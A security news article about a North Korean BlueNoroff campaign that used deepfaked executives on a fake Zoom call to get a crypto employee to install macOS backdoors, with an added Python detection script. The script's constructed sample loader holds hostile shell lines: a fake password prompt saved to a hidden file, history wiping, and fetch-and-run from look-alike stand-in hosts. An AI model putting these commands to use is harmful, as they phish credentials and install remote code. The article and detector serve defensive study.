BlueNoroff Deepfake Zoom Scam Hits Crypto Employee with macOS Backdoor Malware

7 Min Read

The North Korean threat actor known as BlueNoroff has been observed targeting employees in the Web3 sector, using a Zoom call populated with deepfaked company executives to trick them into installing malware on Apple macOS devices.

Huntress, which disclosed details of the intrusion, said the attack targeted an employee at an unnamed cryptocurrency foundation.

“The message asked for time to speak with the employee, and the attacker sent a Calendly link to set up a meeting time,” said security researchers Alden Schmidt, Stuart Ashenbrenner and Jonathan Semon. “The Calendly link was for a Google Meet event, but when clicked, the URL redirects the end user to a fake Zoom domain controlled by the threat actor.”

A few weeks later, the employee reportedly joined a group Zoom meeting along with other external contacts, which included several deepfakes of known members of the company’s senior leadership.

When the employee said they could not get their microphone to work, the synthetic personas urged them to download and install a Zoom extension to fix the supposed issue. The link to the extension, shared via Telegram, downloaded an AppleScript named “zoom_sdk_support.scpt.”

This AppleScript first opens a legitimate Zoom Software Development Kit (SDK) web page as a decoy, but is configured to stealthily download a next-stage payload from a remote server (“support(.)us05web-zoom(.)biz”) and run it as a shell script.

The script starts by disabling Bash history logging, then checks whether Rosetta 2 is installed on the compromised Mac and installs it if it is not. Rosetta 2 is the Apple translation layer that lets Macs with Apple silicon run apps built for Intel (x86_64) Macs, which the attackers need because their later payloads are Intel binaries.

The script then creates a hidden file called “.pwd” and downloads a binary from the malicious Zoom web page (“web071zoom(.)us/fix/audio-fv/7217417464”), followed by a request to “web071zoom(.)us/fix/audio-tr/7217417464” to fetch another, unspecified payload.


The shell script also prompts the user for their system password, wipes the history of executed commands, and otherwise suppresses the forensic trail it leaves behind. Huntress said the investigation uncovered eight different malicious binaries on the victim’s host.
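The loader behaviour described above (history suppression, an on-demand Rosetta 2 install, a hidden credential file, a password prompt, and fetch-and-run from a Zoom look-alike host) is the kind of pattern a defender can match with a simple static scan. The script below is an added example written for this page; it is not code from Huntress or from the malware. The sample loader it scans is constructed to imitate those behaviours, every domain in it is fictional (`.invalid`), and the registrable-domain logic is a deliberate simplification that a real deployment should replace with the Public Suffix List (for instance the `tldextract` package).

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample loader. It imitates the *behaviours* the Huntress write-up
# describes (history suppression, Rosetta 2 install, hidden .pwd file, password
# prompt, fetch-and-run from a Zoom look-alike host). Domains are fictional
# (.invalid); this is not the real script.
SAMPLE_LOADER = r"""#!/bin/bash
unset HISTFILE; export HISTFILESIZE=0
set +o history
if ! /usr/bin/pgrep -q oahd; then
  /usr/sbin/softwareupdate --install-rosetta --agree-to-license
fi
PW=$(osascript -e 'display dialog "Zoom needs your password to fix audio" default answer "" with hidden answer' -e 'text returned of result')
printf '%s' "$PW" > "$HOME/.pwd"
curl -fsSL -o /tmp/audio_fix https://web071zoom.invalid/fix/audio-fv/7217417464
curl -fsSL https://support.us05web-zoom.invalid/zoom_sdk_support.scpt -o /tmp/z.scpt
open https://zoom.us/download
chmod +x /tmp/audio_fix && /tmp/audio_fix
history -c
"""

# Behavioural rules, each a regex matched line by line.
RULES = {
    "history_suppression": re.compile(
        r"unset\s+HISTFILE|HISTFILESIZE=0|set\s+\+o\s+history|history\s+-c\b"),
    "rosetta_install": re.compile(r"softwareupdate\s+--install-rosetta"),
    "hidden_pwd_file": re.compile(r"/\.pwd\b"),
    "password_prompt": re.compile(r"display dialog.*with hidden answer"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
}

LEGIT_ZOOM_DOMAINS = {"zoom.us", "zoom.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    text: str


def scan_script(text: str) -> list[Finding]:
    """Return every (rule, line) pair where a behavioural rule fires."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES.items():
            if rx.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def registrable_domain(host: str) -> str:
    # Assumption: the last two labels approximate the registrable domain.
    # A real deployment should use the Public Suffix List instead.
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def zoom_lookalike_hosts(text: str) -> list[str]:
    """Hosts that mention 'zoom' but are not under a legitimate Zoom domain."""
    seen = []
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname or ""
        if "zoom" in host and registrable_domain(host) not in LEGIT_ZOOM_DOMAINS:
            if host not in seen:
                seen.append(host)
    return seen


def triage(text: str) -> dict:
    """Combine rule hits and look-alike hosts into a verdict."""
    findings = scan_script(text)
    rules_hit = sorted({f.rule for f in findings})
    lookalikes = zoom_lookalike_hosts(text)
    # Verdict heuristic (assumption): anti-forensics plus any two other
    # behaviours, or a remote fetch from a Zoom look-alike host, escalates.
    suspicious = (
        ("history_suppression" in rules_hit and len(rules_hit) >= 3)
        or ("remote_fetch" in rules_hit and bool(lookalikes))
    )
    return {"rules_hit": rules_hit, "lookalike_hosts": lookalikes,
            "findings": findings, "suspicious": suspicious}


if __name__ == "__main__":
    result = triage(SAMPLE_LOADER)
    for f in result["findings"]:
        print(f"line {f.line_no:>2} [{f.rule}] {f.text}")
    print("look-alike hosts:", result["lookalike_hosts"])
    print("suspicious:", result["suspicious"])
```

Run against the sample, the scan reports eight rule hits across five rule categories and two look-alike hosts, while the genuine `zoom.us` link is left alone. The look-alike check is the part worth keeping even if the behavioural rules are tuned away: a hostname that contains “zoom” but whose registrable domain is not Zoom’s is exactly the trick the “us05web-zoom” and “web071zoom” domains rely on.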

  • Telegram 2, a Nim-based binary responsible for launching the primary backdoor
  • Root Troy V4, a fully featured backdoor used to run remote AppleScript payloads and shell commands, and to download and run additional malware
  • InjectWithDyld, a C++ binary loader downloaded by Root Troy V4 that drops two further payloads (one of them named “Rapid”) to facilitate process injection: Nim implants that let the operator issue commands and receive responses asynchronously
  • XScreen, an Objective-C keylogger that monitors the victim’s keystrokes, clipboard and screen and sends the captured data to a command-and-control (C2) server
  • CryptoBot, a Go-based information stealer that collects cryptocurrency-related files from the host
  • NetChk, an almost empty binary designed to generate random numbers forever

BlueNoroff is a sub-cluster within the Lazarus Group that is tracked under the names Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima and TA444, and has a history of financially motivated attacks against banks, ATM networks and cryptocurrency businesses.

The group is best known for orchestrating a series of cryptocurrency heists tracked as TraderTraitor, which target employees of organizations engaged in blockchain research with malicious cryptocurrency trading applications. Notable cases include the February 2025 Bybit hack and the March 2022 Axie Infinity hack.

“Remote workers, especially in high-risk fields, are often ideal targets for groups like TA444,” Huntress said. “It’s important to train employees to identify common attacks that begin with social engineering related to remote meeting software.”


According to DTEX’s latest assessment of North Korea’s cyber structure, the APT38 mission no longer exists in its original form, having split into TraderTraitor (aka Jade Sleet and UNC4899) and CryptoCore (aka Gleaming Pisces, CryptoMimic, Dangerous Password and Leery Turtle), two financially motivated units.

“TraderTraitor appears to have been the most prolific of the DPRK APT groups when it comes to cryptocurrency theft and appears to have drawn the most talented personnel from the original APT38 effort,” DTEX said. “CryptoCore has been active since at least 2018 and likely split off from TraderTraitor/APT38.”

Furthermore, the use of audio-issue-themed lures to get prospective victims to infect their own machines mirrors the evolution of another North Korea-linked campaign, Contagious Interview, which delivers a malware family named GolangGhost using ClickFix-style alerts.

A newer iteration, dubbed ClickFake Interview, posts fake job advertisements and walks job seekers through copying and running malicious commands, under the pretext of fixing camera and microphone access problems, on fake websites the threat actors set up to host hiring assessments.

According to Cisco Talos, these cross-platform attacks have evolved further with a Python version of GolangGhost known as PylangGhost. The fake assessment sites spoof well-known financial entities such as Archblock, Coinbase, Robinhood and Uniswap, and are known to target a small set of users, mostly in India.

“In recent campaigns, Famous Chollima, a threat actor that may consist of multiple groups, is targeting Windows systems using the Python-based version of the Trojan, but continues to deploy the Golang-based version for macOS users,” Talos said. “Linux users are not targeted in these latest campaigns.”


Like its Golang counterpart, PylangGhost can establish contact with a C2 server, allowing attackers to remotely control the infected machine, download and upload files, and steal cookies and credentials from over 80 browser extensions, including password managers and cryptocurrency wallets.

“It is not clear why the threat actors decided to use a different programming language to create the two variants, or why they were created in the first place,” Talos said. “The structure, naming conventions and function names are very similar, which indicates that the developers of the different versions work closely together or are the same person.”
